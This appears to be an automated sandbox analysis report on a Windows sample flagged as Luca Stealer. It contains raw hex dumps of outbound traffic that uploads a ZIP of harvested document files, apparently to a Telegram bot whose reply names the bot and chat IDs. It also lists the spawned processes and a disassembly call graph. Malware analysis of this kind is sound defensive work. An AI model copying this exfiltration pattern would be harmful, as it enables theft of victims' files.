f4 2b b4 0c 9a 74 b4 36 a9 1e d5 2d f7 25 02 cb 0c bf 57 a0 e3 5e b9 3e 7a e2 81 b3 ca 31 24 ac 57 e7 a5 d8 07 f8 9e b4 0d 95 df bf 99 d6 c2 36 a2 0d 78 7b 56 a1
                                                                                        Data Ascii: mkL@7PbU'B]VJeCUYDPW;h3x Mx9(2uH *f]%]8?/yPxGT:$HXSoQSOloj0xg"/&dz9k<\?+oVI/K+t6-%W^>z1$W6x{V
                                                                                        2023-03-08 10:35:12 UTC1024OUTData Raw: 22 a6 15 35 cd b3 df 4d cd 53 1b fa e8 7f e6 c4 99 a1 15 99 3b 6e f4 c9 1c 7a cc d9 9c a4 dc 4e e7 6e 3b 8a 2e 7b ec 5b e8 e6 4f 3d 98 ce dd ff 57 e8 dd 5b f7 a3 86 9e c5 7a 0e a7 ab ef 75 34 bd 5b 92 4f 5b ef 43 93 13 80 9a cc fa e4 0f b2 dc 5f a6 cb 38 29 02 91 c5 06 36 cd c3 69 e7 17 38 33 75 dc 23 69 c7 a7 8f a1 6b 77 9d ca be 3f 9c 93 27 07 78 1f 24 f9 b1 fb 4e 3a f4 ec ff 41 57 d2 f3 e9 d8 e6 3d 74 25 82 8f c2 3f ff 65 4e aa bc d4 c5 68 c7 0d 0c a0 e7 72 92 87 65 70 cc 76 dc f0 58 da f9 37 9f a4 83 cf 3f 88 0e bf 7c 0b 91 5b 70 44 f4 e8 d7 c6 fe 5e 01 1e cb 57 17 c6 f2 d1 3c 96 ef 26 3a f6 47 79 3c 8e 6b c7 23 d2 f5 c4 1f e7 a4 ab c4 45 0a db cd 2a 96 3a 1a 5e e8 9c 68 7e fc 1b fe 98 ae a4 e7 b5 3e 6f ff f5 2f 12 49 12 e8 d1 af e1 84 f3 0f 87 58 ce
                                                                                        Data Ascii: "5MS;nzNn;.{[O=W[zu4[O[C_8)6i83u#ikw?'x$N:AW=t%?eNhrepvX7?|[pD^W<&:Gy<k#E*:^h~>o/IX
                                                                                        2023-03-08 10:35:12 UTC1040OUTData Raw: 93 d8 4b a3 5f 53 9f 10 67 d0 fc a0 dc 2b b3 2f 9b 5d d7 9f 1e 23 81 f9 5c d5 1d ea 23 6c fb e8 97 e3 90 7f e2 2a 9d ce 69 1a 77 d0 af 2b ec cc 6f 83 ff c4 33 e3 ef b2 4d 60 67 62 33 e6 99 9c 26 e0 03 b5 dc 4e 1b 80 67 3a ae 93 29 5e 84 dd b5 d2 ce 56 c7 39 d7 cf be a2 97 c7 eb a2 c7 7f 5f 9e cb d6 df b4 ba b7 9f ef 61 3c 6a cb cb d4 99 a7 95 d7 b5 9b b4 01 78 b6 b5 74 5c f5 30 99 ff c8 1e 76 5e 1e 23 3d 26 b1 14 87 b1 4f 3f 00 1a f3 16 bf 01 e8 34 60 ec e2 f4 80 01 75 73 6c d0 d9 c0 d0 c1 88 d7 ff b4 01 2d 46 62 86 58 2a fa 78 b2 d3 01 c7 c7 9f c5 9b 06 39 92 87 b1 3e 68 79 61 d4 1d 19 e6 a6 c1 0e cd 0f 5a cd fb 0a 38 e4 bf cf 2f f5 d0 e2 9f 25 0e 34 9f 8c 71 33 e9 a1 ba e0 72 6a 99 5d 68 67 31 2f 27 3e 1c 17 e7 d0 7c f7 f7 7a 36 83 6d 98 e7 e2 b6 76 d4
                                                                                        Data Ascii: K_Sg+/]#\#l*iw+o3M`gb3&Ng:)^V9_a<jxt\0v^#=&O?4`usl-FbX*x9>hyaZ8/%4q3rj]hg1/'>|z6mv
                                                                                        2023-03-08 10:35:12 UTC1056OUTData Raw: 77 35 67 e3 5b 1e f9 ac 59 5e 3f 18 6d d0 fc a1 e9 c4 ae 56 2b a1 43 2c 7d aa 22 de 60 c4 8b 05 86 39 75 31 97 93 d8 4c 0c 58 d5 41 c3 ea 0f a8 1e 7a a3 af 79 a4 d0 6c 89 93 56 70 ff 06 d4 78 c6 36 87 76 a0 5a 95 73 7d ca 1b 4f 03 34 bb d8 7d 7a 71 da a1 61 a1 d5 ab 7e 3a de e3 dd ff 58 f9 b1 1f f9 c1 f2 11 1f f5 71 e5 57 fe f3 af 0e 7d f9 63 ef f6 ae e5 c7 9f f7 43 e5 c3 1e fb 31 e5 65 2f fb b5 e2 37 02 9f f0 49 8f 2b 8f fa c0 0f 2e bf ff fb bf 5f 71 c6 f7 1b 7b cf fb e1 1f 18 fc 7f f2 c7 7f b4 fc 93 7f fa 1d e5 39 3f f8 43 c5 da c4 38 87 e5 fd ff 19 4f fb ae 5a 86 d5 6d 82 7b d2 a7 7e 46 bc 97 62 de 17 be e0 79 e5 37 7f f3 b7 ca af ff fa 7f 29 9f 1c 7a 63 38 9e f2 55 5f 51 3e e1 e3 3f b6 3c e4 c1 0f 2e 7f fd 4b ff 46 cd 41 5c 97 74 cc 6b 8b 7d 5c f6 1e
                                                                                        Data Ascii: w5g[Y^?mV+C,}"`9u1LXAzylVpx6vZs}O4}zqa~:XqW}cC1e/7I+._q{9?C8OZm{~Fby7)zc8U_Q>?<.KFA\tk}\
                                                                                        2023-03-08 10:35:12 UTC1072OUTData Raw: bf 4a 8c 79 24 c7 01 3d cf 14 31 75 cc 5b a3 e4 0c 8e 27 6d c6 c8 a1 c7 84 79 9e 1f e3 9d 13 6d f5 3a 4d ac ba 04 b4 61 1c 5a bd 18 d5 37 2c f6 d9 16 0f 75 f3 94 2f 4c f9 a7 0d 68 40 ea fa a1 cb 1a 76 fd d6 b1 87 f2 c9 81 ad 5e b5 49 d6 ac 85 5d 75 09 36 58 f5 65 fe dd da fa cb 06 3d 4e dd b9 00 72 be c5 00 d9 bf b9 f4 5b 57 0e 1b 3b 90 3d 96 ef a0 38 e8 f8 f2 ed c7 22 9a 39 8d 81 21 ea ad 1a a0 3b 73 01 61 db 4f 5b e1 e4 02 e4 40 fa 58 c7 6a 07 64 49 62 24 f3 cb 81 39 af 31 53 ec 67 09 8c 27 75 fb 09 b1 0d c3 18 75 57 8a 33 39 de 21 b6 f9 6c 08 01 36 f9 a6 d8 07 87 75 1c 6c 7a 30 ae f6 5f d8 c6 47 8a 06 44 ad 3e 46 d8 c4 99 4f ff 32 67 d9 b4 2b df f2 eb ce 68 af 7b f5 2b da dd ef 79 af f6 be 3f ff 8b cc f5 75 67 7c 6d 7b ed ab 5e de fc 01 10 7f ec 03 7a
                                                                                        Data Ascii: Jy$=1u['mym:MaZ7,u/Lh@v^I]u6Xe=Nr[W;=8"9!;saO[@XjdIb$91Sg'uuW39!l6ulz0_GD>FO2g+h{+y?ug|m{^z
                                                                                        2023-03-08 10:35:12 UTC1088OUTData Raw: 5c 2b 90 b5 95 97 04 fd fa 03 1b de 1a ad 72 b4 78 80 be 7e 73 3c 0c 63 f6 37 c5 cd 74 0b 1c 90 3a 90 d7 b1 71 1c 73 51 64 88 8b b0 b5 d5 5b 3c 94 a7 b8 79 2e 3d 4c 89 97 03 59 af c5 a3 70 72 b1 c6 00 e1 e9 7f a5 cb ad 21 d7 03 bd be 7a d9 81 ec cd 3c f5 42 17 c8 ba d0 73 8a 2d 9f b1 d0 ed 25 cb cd 2f ce 9e 94 25 75 79 6d 1b 65 fd d0 e3 61 c8 da da ad af 4f 79 3f 16 06 fb bb 00 fa 0b 04 e8 fd e8 83 1e ab bc ac 5b 72 d9 89 1b 1a 65 73 c2 76 4c f5 a5 bf e2 a0 63 4a 17 53 b1 4b 9b 31 bb 76 a0 41 ef 11 ba 5c b8 ca a3 6e 1e 20 c7 0c 1d 07 e4 5c eb 17 2b c6 fc ce 87 36 75 49 9f 76 49 59 9f 04 db f1 da f4 8b 33 0e 98 f7 35 7d 80 6c 8b c4 49 e0 f6 d8 6f c3 30 a6 1f 8c 3d d2 60 68 c0 dc b7 b9 c7 d8 87 7b 4c b7 6b 33 48 db 10 fb b5 b2 5c 5d 19 c8 1c ee 0b ea fa 2a
                                                                                        Data Ascii: \+rx~s<c7t:qsQd[<y.=LYpr!z<Bs-%/%uymeaOy?[resvLcJSK1vA\n \+6uIvIY35}lIo0=`h{Lk3H\]*
                                                                                        2023-03-08 10:35:12 UTC1104OUTData Raw: 50 52 57 47 44 5a 43 51 4c 4d 48 41 4f 4c 59 5a 49 44 4a 4a 58 41 41 53 4f 56 44 4e 48 4e 4d 44 44 43 49 57 46 50 49 4f 4c 51 48 57 51 43 50 55 56 55 5a 55 44 56 4f 4b 42 4d 46 4c 41 4c 43 5a 45 51 57 4a 41 4b 54 56 55 55 44 52 4f 48 45 4b 4a 4b 48 51 42 4c 51 5a 4e 56 57 53 4e 4e 5a 46 4b 4d 5a 4c 51 50 46 59 55 59 48 4e 43 44 54 43 42 56 55 55 4e 4b 4e 5a 49 4f 52 42 46 54 46 56 4b 4c 48 5a 54 51 41 50 57 56 4b 54 54 5a 46 43 54 48 4a 42 42 57 51 4d 5a 54 46 4b 41 44 4a 49 5a 5a 41 4e 55 4f 4c 4c 52 42 53 56 54 55 43 4e 49 4a 57 44 51 50 59 48 45 50 57 45 55 54 46 56 4e 4f 41 43 4f 46 55 52 49 50 54 4c 44 47 4a 55 4f 59 46 4a 52 48 41 55 49 51 52 45 55 4b 55 53 41 44 5a 59 4f 45 44 45 44 5a 52 4b 4b 50 4b 4c 46 4c 46 51 49 4d 4d 49 4b 4c 4f 43 54 53 4f
                                                                                        Data Ascii: PRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSO
                                                                                        2023-03-08 10:35:12 UTC1120OUTData Raw: 00 02 04 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 a4 81 00 00 00 00 41 51 52 46 45 56 52 54 47 4c 2e 64 6f 63 78 50 4b 01 02 2e 03 14 00 00 00 00 00 6b a4 68 56 52 e3 0d dc 02 04 00 00 02 04 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 a4 81 2f 04 00 00 41 51 52 46 45 56 52 54 47 4c 2e 70 64 66 50 4b 01 02 2e 03 14 00 00 00 00 00 6b a4 68 56 97 33 b9 9e 02 04 00 00 02 04 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 a4 81 5d 08 00 00 42 58 41 4a 55 4a 41 4f 45 4f 2e 70 64 66 50 4b 01 02 2e 03 14 00 00 00 00 00 6b a4 68 56 97 33 b9 9e 02 04 00 00 02 04 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 a4 81 8b 0c 00 00 42 58 41 4a 55 4a 41 4f 45 4f 2e 78 6c 73 78 50 4b 01 02 2e 03 14 00 00 00 00 00 6b a4 68 56 14 9f 2f 9a 02 04 00 00 02 04 00 00 0f 00 00 00 00 00 00 00
                                                                                        Data Ascii: AQRFEVRTGL.docxPK.khVR/AQRFEVRTGL.pdfPK.khV3]BXAJUJAOEO.pdfPK.khV3BXAJUJAOEO.xlsxPK.khV/
                                                                                        2023-03-08 10:35:13 UTC1123INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 08 Mar 2023 10:35:13 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 1187
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2023-03-08 10:35:13 UTC1123INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 37 34 39 36 33 35 39 31 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 72 75 73 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 64 6f 6e 74 77 61 6e 6e 61 6d 61 6b 65 69 74 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 34 39 33 39 33 37 39 32 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 46 6f 72 65 78 61 6d 70 6c 65 36 36 36 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 20 76 6f 69 63 65 20 70 6c 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 66 6f 72 65 78 61 6d 70 6c 65 36 36 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22
                                                                                        Data Ascii: {"ok":true,"result":{"message_id":102,"from":{"id":5749635914,"is_bot":true,"first_name":"rust","username":"dontwannamakeitbot"},"chat":{"id":5493937924,"first_name":"Forexample666","last_name":"NO voice pls","username":"forexample666","type":"private"},"


                                                                                        Chrome Debug Log

                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:11:35:00
                                                                                        Start date:08/03/2023
                                                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        Imagebase:0x7ff768b70000
                                                                                        File size:3288576 bytes
                                                                                        MD5 hash:CD12CB026F70700B6D7D3122360C52E8
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.271121352.000001C7F3912000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.271472602.000001C7F3912000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000000.245071773.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        Reputation:low

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:11:35:01
                                                                                        Start date:08/03/2023
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName
                                                                                        Imagebase:0x7ff7cefc0000
                                                                                        File size:447488 bytes
                                                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:.Net C# or VB.NET
                                                                                        Reputation:high

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:11:35:01
                                                                                        Start date:08/03/2023
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff745070000
                                                                                        File size:625664 bytes
                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:20.7%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:49.6%
                                                                                          Total number of Nodes:2000
                                                                                          Total number of Limit Nodes:210
                                                                                          execution_graph 52742 7ff768bacddf 52743 7ff768bacde2 RtlAddVectoredContinueHandler 52742->52743 52744 7ff768bace12 SetThreadStackGuarantee 52743->52744 52745 7ff768bacede 52743->52745 52746 7ff768bace2a GetLastError 52744->52746 52747 7ff768bace38 52744->52747 52750 7ff768bad039 52745->52750 52751 7ff768bad02a 52745->52751 52746->52745 52746->52747 52770 7ff768c5ad00 52747->52770 52749 7ff768bace49 52754 7ff768bacf21 52749->52754 52755 7ff768bace72 52749->52755 52804 7ff768c5b1e0 HeapFree 52750->52804 52752 7ff768bad031 52751->52752 52805 7ff768c5b220 HeapFree 52751->52805 52802 7ff768c5afb0 HeapFree HeapFree 52754->52802 52781 7ff768c5ae30 52755->52781 52756 7ff768bad041 52758 7ff768bad052 52761 7ff768bacfb5 52803 7ff768c5b110 HeapFree HeapFree 52761->52803 52762 7ff768bace7f 52786 7ff768c5b250 52762->52786 52765 7ff768bace87 52792 7ff768b74e26 52765->52792 52768 7ff768baced1 52771 7ff768c5ad28 52770->52771 52772 7ff768c5ad6a 52771->52772 52806 7ff768c5db10 52771->52806 52772->52749 52774 7ff768c5ad44 52775 7ff768c5ad4d 52774->52775 52778 7ff768c5ad6c 52774->52778 52776 7ff768c5ad56 SetThreadDescription 52775->52776 52776->52772 52777 7ff768c5adc6 HeapFree 52776->52777 52777->52772 52778->52772 52779 7ff768c5adc2 52778->52779 52780 7ff768c5adb1 HeapFree 52778->52780 52779->52777 52780->52777 52782 7ff768bad0e0 3 API calls 52781->52782 52783 7ff768c5ae61 52782->52783 52784 7ff768db9d40 4 API calls 52783->52784 52785 7ff768c5ae69 52783->52785 52784->52785 52785->52762 52787 7ff768c5b28f 52786->52787 52789 7ff768c5b324 52787->52789 52843 7ff768c5afb0 HeapFree HeapFree 52787->52843 52789->52765 52790 7ff768c5b401 52844 7ff768c5b110 HeapFree HeapFree 52790->52844 52845 7ff768b9a8a8 52792->52845 52793 7ff768b74e2c 52793->52768 52795 7ff768dbd330 52793->52795 52799 7ff768dbd380 52795->52799 52796 7ff768dbd71c closesocket 52800 7ff768dbd3c4 52796->52800 52797 7ff768c5ae30 HeapAlloc GetProcessHeap HeapAlloc HeapReAlloc 52797->52799 52798 7ff768dbd640 WaitOnAddress 52798->52798 52798->52799 52799->52796 52799->52797 52799->52798 52799->52800 52801 7ff768dbd6a9 CloseHandle 52799->52801 52800->52768 52801->52799 52802->52761 52803->52745 52804->52756 52805->52758 52807 7ff768c5db7a 52806->52807 52808 7ff768c5db41 52806->52808 52830 7ff768c5dd60 9 API calls 52807->52830 52810 7ff768c5dca1 52808->52810 52811 7ff768c5db71 52808->52811 52823 7ff768bad0e0 52808->52823 52839 7ff768bb02e0 52810->52839 52811->52807 52813 7ff768c5dc96 52811->52813 52832 7ff768db9d40 52813->52832 52816 7ff768c5dc4a 52820 7ff768c5dc59 52816->52820 52831 7ff768c5deb0 9 API calls 52816->52831 52817 7ff768c5dba8 52817->52816 52819 7ff768c5dc20 52817->52819 52819->52820 52821 7ff768c5dc39 HeapFree 52819->52821 52820->52774 52821->52820 52824 7ff768bad112 GetProcessHeap 52823->52824 52825 7ff768bad0f9 52823->52825 52824->52825 52829 7ff768bad159 52824->52829 52826 7ff768bad0ff HeapAlloc 52825->52826 52827 7ff768bad12d HeapAlloc 52825->52827 52826->52824 52828 7ff768bad142 52827->52828 52827->52829 52828->52829 52829->52811 52830->52817 52831->52820 52833 7ff768db9d49 52832->52833 52835 7ff768db9de6 52833->52835 52842 7ff768bb0300 HeapAlloc GetProcessHeap HeapAlloc HeapReAlloc 52833->52842 52835->52810 52836 7ff768db9dc0 52836->52835 52837 7ff768db9d40 4 API calls 52836->52837 52838 7ff768db9e00 52837->52838 52840 7ff768bb02e5 HeapFree 52839->52840 52841 7ff768bb02f8 52839->52841 52840->52841 52841->52774 52842->52836 52843->52790 52844->52789 52846 7ff768b9a8d8 52845->52846 52847 7ff768bad0e0 3 API calls 52846->52847 52849 7ff768b9ab2d 52846->52849 52853 7ff768b9a963 52846->52853 52847->52853 52848 7ff768bad0e0 3 API calls 52856 7ff768b9aa36 52848->52856 52851 7ff768db9d40 4 API calls 52849->52851 52854 7ff768b9ab32 52849->52854 52850 7ff768bad0e0 3 API calls 52850->52849 52852 7ff768b9ac7e 52851->52852 52855 7ff768bad0e0 3 API calls 52852->52855 52853->52848 52853->52849 52853->52856 52854->52793 52857 7ff768b9acb0 52855->52857 52856->52849 52856->52850 52856->52854 52958 7ff768b9e0cc 52857->52958 53055 7ff768c7e54e 52857->53055 52859 7ff768b9ae1b 53058 7ff768c86655 52859->53058 52860 7ff768b9accd 52860->52859 52863 7ff768b9ae07 HeapFree 52860->52863 53053 7ff768b9ddcc 52860->53053 52863->52859 52864 7ff768b9aeaa memcpy memcpy memcpy 53132 7ff768c870ae 52864->53132 52958->52793 53248 7ff768dbbbc1 HeapAlloc GetProcessHeap HeapAlloc HeapReAlloc 53053->53248 53056 7ff768c7e776 23 API calls 53055->53056 53057 7ff768c7e55b 53056->53057 53057->52860 53059 7ff768c86a2c 53058->53059 53060 7ff768c86683 CreateIoCompletionPort 53058->53060 53256 7ff768c820b4 HeapAlloc GetProcessHeap HeapAlloc HeapReAlloc 53059->53256 53062 7ff768c86a59 GetLastError 53060->53062 53063 7ff768c866a1 53060->53063 53065 7ff768b9ae92 53062->53065 53066 7ff768bad0e0 3 API calls 53063->53066 53064 7ff768c86a31 53068 7ff768c86c33 memcpy memcpy memcpy memcpy 53064->53068 53126 7ff768c87058 53064->53126 53065->52864 53065->52958 53067 7ff768c866b3 53066->53067 53073 7ff768bad0e0 3 API calls 53067->53073 53067->53126 53069 7ff768c86e77 memcpy 53068->53069 53070 7ff768c86d17 53068->53070 53072 7ff768c86eb4 memcpy memcpy 53069->53072 53257 7ff768c77fb0 6 API calls 53070->53257 53072->53065 53078 7ff768c866ed 53073->53078 53074 7ff768c86d1f 53075 7ff768db9d40 4 API calls 53075->53126 53078->53126 53250 7ff768c82387 53078->53250 53126->53075 53133 7ff768bad0e0 3 API calls 53132->53133 53134 7ff768c870d3 53133->53134 53256->53064 53257->53074 53427 7ff768b978e4 53428 7ff768b97928 53427->53428 53587 7ff768c67140 53428->53587 53430 7ff768b979ca 53431 7ff768b979d0 53430->53431 53432 7ff768bb09e0 5 API calls 53430->53432 53433 7ff768befd87 4 API calls 53431->53433 53438 7ff768b97ad6 53432->53438 53434 7ff768b97f13 53433->53434 53435 7ff768b97f45 53434->53435 53436 7ff768b97f2e HeapFree 53434->53436 53437 7ff768b97f4f HeapFree 53435->53437 53440 7ff768b97f61 53435->53440 53436->53435 53437->53440 53438->53438 53439 7ff768c7c920 5 API calls 53438->53439 53449 7ff768b97b9b 53439->53449 53441 7ff768bb09e0 5 API calls 53440->53441 53586 7ff768b9a61c 53440->53586 53442 7ff768b98084 53441->53442 53444 7ff768b9808f HeapFree 53442->53444 53445 7ff768b980a6 53442->53445 53443 7ff768b97ee2 53742 7ff768b77ea7 53443->53742 53444->53445 53605 7ff768c63650 53445->53605 53448 7ff768b97d19 HeapFree 53448->53449 53449->53443 53449->53448 53450 7ff768bb09e0 5 API calls 53449->53450 53451 7ff768c7c630 24 API calls 53449->53451 53453 7ff768b9a5b5 53449->53453 53454 7ff768b97ebf HeapFree 53449->53454 53449->53586 53450->53449 53451->53449 53452 7ff768b98108 53455 7ff768bb09e0 5 API calls 53452->53455 53452->53586 53456 7ff768b9a5cf HeapFree 53453->53456 53457 7ff768b9a5e1 53453->53457 53454->53449 53458 7ff768b9859a 53455->53458 53456->53457 53459 7ff768b9a5f6 HeapFree 53457->53459 53460 7ff768b9a608 53457->53460 53461 7ff768b985d3 53458->53461 53462 7ff768b985a5 HeapFree 53458->53462 53459->53460 53463 7ff768b77ea7 16 API calls 53460->53463 53763 7ff768c51b93 53461->53763 53462->53461 53465 7ff768b985d1 53462->53465 53463->53434 53466 7ff768bb09e0 5 API calls 53465->53466 53465->53586 53467 7ff768b98703 53466->53467 53468 7ff768b9870e HeapFree 53467->53468 53469 7ff768b9872d 53467->53469 53468->53469 53470 7ff768b9874a 53469->53470 53471 7ff768c51b93 10 API calls 53469->53471 53613 7ff768befd87 53470->53613 53471->53470 53474 7ff768b987f5 53476 7ff768befd87 4 API calls 53474->53476 53475 7ff768c51b93 10 API calls 53475->53474 53477 7ff768b98868 53476->53477 53478 7ff768b9888c 53477->53478 53479 7ff768c51b93 10 API calls 53477->53479 53480 7ff768befd87 4 API calls 53478->53480 53479->53478 53481 7ff768b988f7 53480->53481 53482 7ff768b98918 53481->53482 53483 7ff768c51b93 10 API calls 53481->53483 53484 7ff768befd87 4 API calls 53482->53484 53483->53482 53588 7ff768c63650 23 API calls 53587->53588 53589 7ff768c671cd 53588->53589 53590 7ff768c671d9 53589->53590 53591 7ff768c672d2 53589->53591 53592 7ff768c672eb 53590->53592 53796 7ff768c643d0 53590->53796 53593 7ff768c642c0 2 API calls 53591->53593 53592->53430 53595 7ff768c672dd CloseHandle 53593->53595 53595->53592 53596 7ff768c67212 53597 7ff768c6722d memset FindFirstFileW 53596->53597 53602 7ff768c672fd 53596->53602 53598 7ff768c6725e FindClose 53597->53598 53599 7ff768c6728e 53597->53599 53598->53599 53600 7ff768c6736c HeapFree 53599->53600 53601 7ff768c6737e 53599->53601 53600->53601 53601->53592 53601->53602 53602->53592 53603 7ff768c673da HeapFree 53602->53603 53604 7ff768c673cb HeapFree 53602->53604 53603->53592 53604->53603 53606 7ff768c643d0 20 API calls 53605->53606 53608 7ff768c6366e 53606->53608 53607 7ff768c636a3 53607->53452 53608->53607 53609 7ff768c636d3 53608->53609 53611 7ff768c63781 CreateFileW 53608->53611 53609->53607 53610 7ff768c637d9 RtlReleasePrivilege 53609->53610 53610->53607 53611->53609 53612 7ff768c637bd GetLastError 53611->53612 53612->53609 53614 7ff768b987d4 53613->53614 53615 7ff768befd94 53613->53615 53614->53474 53614->53475 53616 7ff768befdc8 53615->53616 53617 7ff768bad0e0 3 API calls 53615->53617 53618 7ff768befda3 53617->53618 53618->53614 53619 7ff768db9d40 4 API calls 53618->53619 53619->53614 53743 7ff768b77eef 53742->53743 53747 7ff768b77ec0 53742->53747 53889 7ff768b780a0 53743->53889 53745 7ff768b77f58 53746 7ff768b77f5f HeapFree 53745->53746 53750 7ff768b77f72 53745->53750 53746->53750 53747->53743 53748 7ff768b77ee0 HeapFree 53747->53748 53748->53743 53749 7ff768b77fe5 53752 7ff768b78005 53749->53752 53753 7ff768b77fef HeapFree 53749->53753 53750->53749 53754 7ff768b77fa4 HeapFree 53750->53754 53760 7ff768b77fc0 CloseHandle 53750->53760 53761 7ff768b78083 53750->53761 53751 7ff768b77ef7 53751->53745 53896 7ff768c8fbf4 6 API calls 53751->53896 53897 7ff768c9ab60 FindClose 53751->53897 53756 7ff768b78046 53752->53756 53762 7ff768b7802c HeapFree 53752->53762 53753->53752 53754->53750 53758 7ff768b78074 53756->53758 53759 7ff768b78050 HeapFree 53756->53759 53758->53431 53759->53758 53760->53750 53762->53752 53764 7ff768c51ba3 53763->53764 53765 7ff768c51c49 53763->53765 53766 7ff768c51b12 9 API calls 53764->53766 53765->53465 53767 7ff768c51c26 53766->53767 53767->53765 53768 7ff768db9d40 4 API calls 53767->53768 53769 7ff768c51c64 53768->53769 53797 7ff768c5db10 11 API calls 53796->53797 53801 7ff768c64402 53797->53801 53798 7ff768c6446d 53798->53596 53799 7ff768c645f8 SetLastError GetFullPathNameW 53799->53801 53802 7ff768c6461c GetLastError 53799->53802 53801->53798 53801->53799 53803 7ff768c6463c GetLastError 53801->53803 53813 7ff768c6466e 53801->53813 53829 7ff768dbdb10 9 API calls 53801->53829 53802->53801 53804 7ff768c646c5 GetLastError 53802->53804 53803->53801 53808 7ff768c649a7 53803->53808 53805 7ff768c64928 HeapFree 53804->53805 53806 7ff768c646e4 53804->53806 53805->53806 53806->53798 53807 7ff768c6495f HeapFree 53806->53807 53807->53798 53809 7ff768bb02e0 HeapFree 53808->53809 53810 7ff768c64a1f 53809->53810 53811 7ff768bb02e0 HeapFree 53810->53811 53814 7ff768c64a32 53811->53814 53812 7ff768c64834 53818 7ff768c6484a memcpy 53812->53818 53837 7ff768dbdb10 9 API calls 53812->53837 53813->53808 53813->53812 53830 7ff768c5bcf0 53813->53830 53814->53596 53819 7ff768c648c9 memcpy 53818->53819 53820 7ff768c648a2 53818->53820 53821 7ff768c648ec 53819->53821 53822 7ff768c648fb 53819->53822 53838 7ff768dbdb10 9 API calls 53820->53838 53839 7ff768c5deb0 9 API calls 53821->53839 53822->53805 53822->53806 53826 7ff768c648b4 53826->53819 53827 7ff768c649d5 53827->53808 53828 7ff768db9d40 4 API calls 53827->53828 53828->53808 53829->53801 53831 7ff768c5bd02 53830->53831 53836 7ff768c5bd23 53830->53836 53832 7ff768c5bd32 53831->53832 53833 7ff768c5bd15 53831->53833 53835 7ff768bad0e0 3 API calls 53832->53835 53832->53836 53840 7ff768bad190 53833->53840 53835->53836 53836->53812 53836->53818 53836->53827 53837->53818 53838->53826 53839->53822 53841 7ff768bad1a7 HeapReAlloc 53840->53841 53842 7ff768bad1c8 53840->53842 53841->53842 53843 7ff768bad1ef HeapAlloc 53842->53843 53844 7ff768bad1da GetProcessHeap 53842->53844 53845 7ff768bad241 53843->53845 53847 7ff768bad202 